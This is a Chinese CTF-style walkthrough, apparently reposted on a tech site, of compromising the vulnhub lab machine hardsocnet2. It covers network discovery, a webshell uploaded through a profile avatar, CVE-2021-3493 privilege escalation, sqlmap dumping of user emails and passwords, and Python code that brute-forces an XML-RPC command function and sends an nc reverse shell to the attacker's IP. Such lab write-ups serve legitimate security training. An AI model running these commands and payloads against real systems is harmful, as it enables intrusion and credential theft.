IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> kali之vulnhubhardsocnet2 -> 正文阅读

[网络协议]kali之vulnhubhardsocnet2

目录

一、环境配置问题

二、主机发现

1.arp-scan

2.arping

3.netdiscover

4.nmap

三、端口扫描

四、服务版本发现

五、登录web服务

1.8000端口

2.80端口

(1)80端口是个登录地址

(2)注册并登录,进行信息收集

?六、信息收集

1.界面

2.profile

七、antsword(蚁剑)

1.通过蚁剑来连接我们上传的后门文件

2.查看内核版本

?八、提权

1.上传文件

2.编译执行

3.反弹shell

九、主页下的sql注入

?1.在search框里还有一个sql注入点

2.抓包,sqlmap跑一下

(1)request的包保存到本地

(2)sqlmap

2.1跑下数据库

2.2 跑下表

2.3看下列

2.4看下user_password和user_email中的字段


一、环境配置问题

这次在导入靶场的时候,由于各种问题,就卸载了一次,但再次安装时,显示无法导入,经过一番搜索,发现是虚拟硬盘没有删除干净,将原先创建的虚拟硬盘删除后,再次导入,即可导入成功

二、主机发现

靶机和kali位于同一网段,总结下四种方法。

1.arp-scan

sudo arp-scan -l

2.arping

由于这个arping是对单个ip进行发包的,所以简单写个循环

for i in $(seq 1 254);do sudo arping -c 2 192.168.43.$i;done

3.netdiscover

sudo netdiscover -r 192.168.43.27/16

4.nmap

sudo nmap -sn ip/子网掩码

三、端口扫描

四、服务版本发现

五、登录web服务

1.8000端口

8000端口页面报错,写的不支持get请求方法,我们可以用burpsuite抓包后,来尝试别的登陆方式,如option,post等,发现还是无用

2.80端口

(1)80端口是个登录地址

(2)注册并登录,进行信息收集

?六、信息收集

1.界面

是一个留言板,我们输入的信息会输出到下面,上栏有一系列的功能框

2.profile

这里面可以上传头像,并且可以查看到路径地址,并且可以上传一个一句话木马,

七、antsword(蚁剑)

1.通过蚁剑来连接我们上传的后门文件

2.查看内核版本

uname -a

查看具体版本

lsb_release -a

?八、提权

使用ubuntu内核漏洞版本来提权

cve-2021-3493 ,github上可下载

1.上传文件

2.编译执行

发现可以执行,但是被exit退出了,提示是不能工作在这个shell上,蚁剑shell功能不够导致了提权失败,所以我们向kali端反弹shell来执行exp

3.反弹shell

用一个nc串联来反弹shell ,后执行exp,发现提权成功

九、主页下的sql注入

?1.在search框里还有一个sql注入点

2.抓包,sqlmap跑一下

(1)request的包保存到本地

(2)sqlmap

sqlmap -r r -p query

2.1跑下数据库

sqlmap -r r -p query --dbs

2.2 跑下表

sqlmap -r r -p query -D socialnetwork --tables

2.3看下列

sqlmap -r r -p query -D socialnetwoek -T users --columns

2.4看下user_password和user_email中的字段

sqlmap -r r -p query -D socialnetwork -T users -C user_email,user_password --dump

可以看到我们已经知道了邮箱号和对应的密码,并且这个SQLmap帮我们进行了hash解密。得到了 明文密码。


除了这种提权方式,我们还有另一种提权方式

一、信息收集

1.查看/etc/passwd

我们找到一个可以通过shell登录系统的用户

?我们可以看到admin账号留言的那个程序,并且用

ps aux | grep "monitor"

可以看到此程序正在运行

?2.查看monitor文件

简单分析python文件,上边导入库,之后random产生了一个随机数,下边定义了执行命令函数,几个写死的命令函数,和一个可控参数的命令函数(随机数与输入值相等执行命令)。server.register给这些函数注册可以调用,这些都是基于一个xmlrpc的库来实现的,所以我们去python库手册查看它的用法。

?3.xmlrpc用法

可以在库手册中找到一个示例:,接下来我们结合xmlrpc用法 利用monitor的可控变量函数

二、利用monitor反弹shell

1.首先破解随机数

import xmlrpc.client

with xmlrpc.client.ServerProxy("http://192.168.43.65:8000/") as proxy:
    for a in range(1000,10000):
        result=str(proxy.secure_cmd("whoami",a))
        if not "Wrong" in result:
    	    print(a)

2.反弹shell

开启侦听端口,利用获得的随机数反弹shell

import xmlrpc.client

with xmlrpc.client.ServerProxy("http://192.168.43.65:8000/") as proxy:
    a=6332
    str(proxy.secure_cmd("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.43.27 4444 >/tmp/f",a))

?

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-05-18 17:59:21  更:2022-05-18 18:00:06 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/26 0:30:44-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码